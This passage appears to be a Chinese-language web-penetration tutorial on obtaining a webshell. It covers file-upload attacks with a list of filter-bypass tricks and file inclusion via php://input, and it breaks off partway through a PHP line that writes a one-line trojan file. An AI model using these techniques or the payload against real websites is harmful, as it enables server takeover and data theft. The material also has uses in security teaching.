授人以鱼,不如授人以渔
getshell能干嘛
1.执行终端命令
2.文件管理(增删改查)
3.数据库管理(增删改查,前提找到root用户密码)
文件上传getshell
网站有上传点,最容易getshell。
直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell
如果web应用对上传的文件进行过滤,要想办法绕过,如前端js绕过
,MIME验证绕过
,黑名单绕过
,大小写绕过
,双写绕过
,00截断
,利用web容器的解析漏洞绕过
等等,这里就不一一列举了
文件包含getshell
利用文件包含漏洞,输入php://input伪协议,进行写入一句话木马
<?php fputs(fopen('muma1.php','w'),'